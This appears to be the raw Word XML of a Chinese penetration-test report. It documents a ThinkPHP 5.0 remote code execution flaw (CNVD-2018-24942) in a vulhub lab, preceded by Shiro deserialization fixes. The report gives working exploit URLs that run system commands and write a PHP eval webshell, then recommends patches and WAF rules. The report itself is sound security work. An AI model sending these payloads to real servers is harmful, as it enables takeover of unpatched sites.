                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">4. 输入验证与过滤 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>对所有反序列化操作实施白名单控制，使用Shiro的`DefaultSerializer`或自定义`Serializer`接口实现，限制可反序列化的类范围。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5. 网络层防护</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>：“</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>在WAF或反向代理中拦截包含可疑`rememberMe` Cookie的请求，设置HTTP头`X-Content-Type-Options: nosniff`防止MIME混淆攻击</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">6. 深度防御补充  </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">   - 启用Java安全管理器（SecurityManager）配置反序列化策略文件。  </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">   - 监控`org.apache.shiro.io`类的异常反序列化行为，结合日志审计工具（如ELK）实现实时告警。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复测情况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</w:pPr>
          </w:p>
          <w:p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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc27022"/>
      <w:bookmarkStart w:id="9" w:name="_Toc491941571"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ThinkPHP 任意代码执行 CNVD-2018-24942 等 RCE 经典漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="16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4219"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="11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auto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auto"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="宋体"/>
                <w:color w:val="auto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ThinkPHP 任意代码执行 CNVD-2018-24942 等 RCE 经典漏洞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rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto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auto"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞等级</w:t>
            </w:r>
          </w:p>
        </w:tc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120" w:firstLineChars="50"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="宋体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bCs/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>高危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auto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auto"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞地址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default"/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>http://127.0.0.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>:8080/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auto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auto"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>描述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default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="宋体"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="1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4"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>ThinkPHP 远程代码执行漏洞 (CNVD-2018-24942)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24"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t> 是由于框架对控制器名未能进行足够的检测，攻击者可以利用该漏洞对目标网站进行远程命令执行攻击。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auto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auto"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞证明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Docker环境部署：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0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docker pull vulhub/thinkphp:5.0.20</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default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color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>docker run -d -p 8080:80 vulhub/thinkphp:5.0.20</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New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访问漏洞页面</w:t>
            </w:r>
            <w:r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http://localhost:8080</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4354830" cy="2023745"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="317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830" cy="2023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打开靶场环境，直接构造payload：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rStyle w:val="22"/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22"/>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="22"/>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>192.168.194.129</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="22"/>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>:8080/?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=pwd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4356735" cy="2603500"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="254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735" cy="260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</w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4354195" cy="2576830"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="13970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195" cy="2576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写入Webshell：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:p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http://192.168.194.129:8080/?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=file_put_contents&amp;vars[1][]=shell.php&amp;vars[1][]=&lt;?php @eval($_POST['cmd']);?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4359910" cy="2595245"/>
                  <wp:effectExtent l="0" t="0" r="13970" b="10795"/>
                  <wp:docPr id="1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910" cy="259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使用蚁剑连接：成功连接</w:t>
            </w:r>
          </w:p>
          <w:p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353560" cy="2936240"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
                  <wp:docPr id="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60" cy="293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355465" cy="2897505"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="13335"/>
                  <wp:docPr id="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5465" cy="289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成功获取文件信息</w:t>
            </w:r>
          </w:p>
          <w:p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auto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auto"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>整改建议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default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1.立即升级框架版本：官方已发布安全补丁，需将ThinkPHP升级至5.0.24+或5.1.32+版本，彻底修复路由解析缺陷导致的代码注入风险。  </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2.禁用危险函数：在`php.ini`中通过`disable_functions`关闭`system`、`exec`、`passthru`等高危函数，限制PHP执行能力。  </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3.强化路由安全：配置URL路由白名单，严格过滤用户输入的控制器/方法名，禁止特殊字符（如`\`、`/`）及敏感关键字（如`think\app`）。  </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">4.WAF防护：部署Web应用防火墙，拦截包含`invokefunction`、`call_user_func_array`等特征的可疑请求。  </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">5.最小权限运行：以非root用户运行Web服务，限制目录写入权限（如关闭`runtime`目录执行权限）。  </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="auto"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">6.日志监控与审计：实时监控`thinkphp`日志中的异常路由请求，结合SIEM系统实现攻击行为告警。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auto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auto"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>复测情况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color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p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bookmarkEnd w:id="9"/>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId13" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="595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0" w:firstLineChars="0"/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第</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="20"/>
      </w:rPr>
      <w:t>I</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="20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0" w:firstLineChars="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:t>《渗</w:t>
    </w:r>
    <w:r>
      <w:t>透测试服务技术报告》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0" w:firstLineChars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932524"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BD9325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16073C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="316073C0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1.%2.%3.%4.%5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ODMxYTE0ZTc0ZGU3Y2QwODc3MzYzN2Q1YmNiM2EifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00503B51"/>
    <w:rsid w:val="0001096C"/>
    <w:rsid w:val="00010F9C"/>
    <w:rsid w:val="0001127F"/>
    <w:rsid w:val="0001361B"/>
    <w:rsid w:val="00027CBD"/>
    <w:rsid w:val="00030119"/>
    <w:rsid w:val="00034C51"/>
    <w:rsid w:val="00037426"/>
    <w:rsid w:val="00046D07"/>
    <w:rsid w:val="0006036D"/>
    <w:rsid w:val="00061AF9"/>
    <w:rsid w:val="000645AF"/>
    <w:rsid w:val="00065395"/>
    <w:rsid w:val="00073724"/>
    <w:rsid w:val="00076A77"/>
    <w:rsid w:val="00076CDE"/>
    <w:rsid w:val="00076D22"/>
    <w:rsid w:val="000807A5"/>
    <w:rsid w:val="000851E2"/>
    <w:rsid w:val="0009753B"/>
    <w:rsid w:val="000A7CBD"/>
    <w:rsid w:val="000B05C7"/>
    <w:rsid w:val="000B66D5"/>
    <w:rsid w:val="000C082A"/>
    <w:rsid w:val="000C7F9B"/>
    <w:rsid w:val="000D205C"/>
    <w:rsid w:val="000E2546"/>
    <w:rsid w:val="000E5504"/>
    <w:rsid w:val="000E6582"/>
    <w:rsid w:val="000E7F31"/>
    <w:rsid w:val="00100233"/>
    <w:rsid w:val="00101785"/>
    <w:rsid w:val="00101A1C"/>
    <w:rsid w:val="00140154"/>
    <w:rsid w:val="0014413A"/>
    <w:rsid w:val="00150AC3"/>
    <w:rsid w:val="001512B7"/>
    <w:rsid w:val="0015541E"/>
    <w:rsid w:val="00166CCD"/>
    <w:rsid w:val="00167C63"/>
    <w:rsid w:val="0017651E"/>
    <w:rsid w:val="00177C09"/>
    <w:rsid w:val="0019304B"/>
    <w:rsid w:val="00194109"/>
    <w:rsid w:val="001A04EA"/>
    <w:rsid w:val="001A2A2C"/>
    <w:rsid w:val="001B1000"/>
    <w:rsid w:val="001B3D68"/>
    <w:rsid w:val="001D430E"/>
    <w:rsid w:val="001F2B3F"/>
    <w:rsid w:val="0020543D"/>
    <w:rsid w:val="002161E4"/>
    <w:rsid w:val="00225D22"/>
    <w:rsid w:val="00234354"/>
    <w:rsid w:val="00240BEA"/>
    <w:rsid w:val="00245D4A"/>
    <w:rsid w:val="002468FA"/>
    <w:rsid w:val="002470C3"/>
    <w:rsid w:val="00247358"/>
    <w:rsid w:val="00251229"/>
    <w:rsid w:val="00256D44"/>
    <w:rsid w:val="00266F40"/>
    <w:rsid w:val="00272080"/>
    <w:rsid w:val="00273CB6"/>
    <w:rsid w:val="00275FFF"/>
    <w:rsid w:val="002800A6"/>
    <w:rsid w:val="00280C31"/>
    <w:rsid w:val="00281CFB"/>
    <w:rsid w:val="002852CF"/>
    <w:rsid w:val="002C1692"/>
    <w:rsid w:val="002C522E"/>
    <w:rsid w:val="002D7A69"/>
    <w:rsid w:val="002F1A62"/>
    <w:rsid w:val="002F2642"/>
    <w:rsid w:val="00326DCF"/>
    <w:rsid w:val="0033088F"/>
    <w:rsid w:val="00331970"/>
    <w:rsid w:val="00331C52"/>
    <w:rsid w:val="00342366"/>
    <w:rsid w:val="00342AC3"/>
    <w:rsid w:val="00343810"/>
    <w:rsid w:val="00347348"/>
    <w:rsid w:val="00360F94"/>
    <w:rsid w:val="00363A69"/>
    <w:rsid w:val="0036634E"/>
    <w:rsid w:val="003738A1"/>
    <w:rsid w:val="00373B0C"/>
    <w:rsid w:val="00380850"/>
    <w:rsid w:val="00382050"/>
    <w:rsid w:val="00391EBD"/>
    <w:rsid w:val="0039412B"/>
    <w:rsid w:val="0039557F"/>
    <w:rsid w:val="003A035F"/>
    <w:rsid w:val="003A58BF"/>
    <w:rsid w:val="003B2D8B"/>
    <w:rsid w:val="003B3A2D"/>
    <w:rsid w:val="003B46B5"/>
    <w:rsid w:val="003B6D21"/>
    <w:rsid w:val="003C04B2"/>
    <w:rsid w:val="003D0357"/>
    <w:rsid w:val="003D2BAF"/>
    <w:rsid w:val="003D4082"/>
    <w:rsid w:val="003E05D6"/>
    <w:rsid w:val="003E586D"/>
    <w:rsid w:val="003E6CB3"/>
    <w:rsid w:val="003E79BB"/>
    <w:rsid w:val="003F0C9C"/>
    <w:rsid w:val="003F0E91"/>
    <w:rsid w:val="003F4397"/>
    <w:rsid w:val="00414A71"/>
    <w:rsid w:val="00421427"/>
    <w:rsid w:val="004338BC"/>
    <w:rsid w:val="004339DD"/>
    <w:rsid w:val="0044132F"/>
    <w:rsid w:val="00445CF9"/>
    <w:rsid w:val="00451EE5"/>
    <w:rsid w:val="00453097"/>
    <w:rsid w:val="00466F0E"/>
    <w:rsid w:val="00484718"/>
    <w:rsid w:val="00484C2C"/>
    <w:rsid w:val="00485BE9"/>
    <w:rsid w:val="00490378"/>
    <w:rsid w:val="00493506"/>
    <w:rsid w:val="00497249"/>
    <w:rsid w:val="00497BB8"/>
    <w:rsid w:val="004A2800"/>
    <w:rsid w:val="004A47D9"/>
    <w:rsid w:val="004A7EAD"/>
    <w:rsid w:val="004B09E6"/>
    <w:rsid w:val="004B16D3"/>
    <w:rsid w:val="004B406C"/>
    <w:rsid w:val="004B4F40"/>
    <w:rsid w:val="004C271B"/>
    <w:rsid w:val="004D56BD"/>
    <w:rsid w:val="004F0ED7"/>
    <w:rsid w:val="00500FFE"/>
    <w:rsid w:val="0050278F"/>
    <w:rsid w:val="00503B51"/>
    <w:rsid w:val="00507AC6"/>
    <w:rsid w:val="00520A33"/>
    <w:rsid w:val="00525429"/>
    <w:rsid w:val="005273E9"/>
    <w:rsid w:val="005300F2"/>
    <w:rsid w:val="00554F43"/>
    <w:rsid w:val="00565363"/>
    <w:rsid w:val="00581029"/>
    <w:rsid w:val="005914E4"/>
    <w:rsid w:val="0059258C"/>
    <w:rsid w:val="00592A8D"/>
    <w:rsid w:val="005B3075"/>
    <w:rsid w:val="005C26B4"/>
    <w:rsid w:val="005C5FA0"/>
    <w:rsid w:val="005D0798"/>
    <w:rsid w:val="005D2A12"/>
    <w:rsid w:val="005F79A3"/>
    <w:rsid w:val="00606A81"/>
    <w:rsid w:val="00622733"/>
    <w:rsid w:val="00626260"/>
    <w:rsid w:val="00634F17"/>
    <w:rsid w:val="00647E80"/>
    <w:rsid w:val="00657F76"/>
    <w:rsid w:val="00670792"/>
    <w:rsid w:val="006A01C0"/>
    <w:rsid w:val="006A22DF"/>
    <w:rsid w:val="006B11CD"/>
    <w:rsid w:val="006B1E92"/>
    <w:rsid w:val="006C5BAE"/>
    <w:rsid w:val="006E4111"/>
    <w:rsid w:val="006E580D"/>
    <w:rsid w:val="00700C82"/>
    <w:rsid w:val="00702582"/>
    <w:rsid w:val="00713198"/>
    <w:rsid w:val="00714AC7"/>
    <w:rsid w:val="00717E5C"/>
    <w:rsid w:val="007257A6"/>
    <w:rsid w:val="00735755"/>
    <w:rsid w:val="00743617"/>
    <w:rsid w:val="00750D61"/>
    <w:rsid w:val="00753078"/>
    <w:rsid w:val="007560F9"/>
    <w:rsid w:val="007562CD"/>
    <w:rsid w:val="00760336"/>
    <w:rsid w:val="0077362E"/>
    <w:rsid w:val="007A5078"/>
    <w:rsid w:val="007A5187"/>
    <w:rsid w:val="007A6655"/>
    <w:rsid w:val="007C489B"/>
    <w:rsid w:val="007D056A"/>
    <w:rsid w:val="007F2CEB"/>
    <w:rsid w:val="00801D0B"/>
    <w:rsid w:val="00811CD1"/>
    <w:rsid w:val="00813E8B"/>
    <w:rsid w:val="00815479"/>
    <w:rsid w:val="00822338"/>
    <w:rsid w:val="00827A7A"/>
    <w:rsid w:val="00836AE8"/>
    <w:rsid w:val="00842949"/>
    <w:rsid w:val="008441A2"/>
    <w:rsid w:val="00847BAA"/>
    <w:rsid w:val="008503D0"/>
    <w:rsid w:val="0085445D"/>
    <w:rsid w:val="008660F8"/>
    <w:rsid w:val="00866275"/>
    <w:rsid w:val="00877882"/>
    <w:rsid w:val="00884717"/>
    <w:rsid w:val="00891669"/>
    <w:rsid w:val="008A639F"/>
    <w:rsid w:val="008A66D2"/>
    <w:rsid w:val="008C1C70"/>
    <w:rsid w:val="008C4830"/>
    <w:rsid w:val="008D0250"/>
    <w:rsid w:val="008D0A63"/>
    <w:rsid w:val="008E359A"/>
    <w:rsid w:val="008F36E2"/>
    <w:rsid w:val="008F5D36"/>
    <w:rsid w:val="008F5FB1"/>
    <w:rsid w:val="00900C4C"/>
    <w:rsid w:val="0090454F"/>
    <w:rsid w:val="00911942"/>
    <w:rsid w:val="00915D5A"/>
    <w:rsid w:val="00921AEA"/>
    <w:rsid w:val="00930EC5"/>
    <w:rsid w:val="00936B55"/>
    <w:rsid w:val="00936D0E"/>
    <w:rsid w:val="0094686A"/>
    <w:rsid w:val="009637B4"/>
    <w:rsid w:val="009647D9"/>
    <w:rsid w:val="009745B5"/>
    <w:rsid w:val="00976E8E"/>
    <w:rsid w:val="00976F53"/>
    <w:rsid w:val="0098215E"/>
    <w:rsid w:val="00982E3B"/>
    <w:rsid w:val="00990583"/>
    <w:rsid w:val="0099083D"/>
    <w:rsid w:val="00990D26"/>
    <w:rsid w:val="00994021"/>
    <w:rsid w:val="00995B16"/>
    <w:rsid w:val="009A1837"/>
    <w:rsid w:val="009A2F1C"/>
    <w:rsid w:val="009B6F68"/>
    <w:rsid w:val="009D26DB"/>
    <w:rsid w:val="009D4005"/>
    <w:rsid w:val="009D4BCF"/>
    <w:rsid w:val="009D51B1"/>
    <w:rsid w:val="009E0426"/>
    <w:rsid w:val="009E4820"/>
    <w:rsid w:val="009E5CFC"/>
    <w:rsid w:val="009E66B4"/>
    <w:rsid w:val="009F1F60"/>
    <w:rsid w:val="009F317F"/>
    <w:rsid w:val="00A03F1E"/>
    <w:rsid w:val="00A0469E"/>
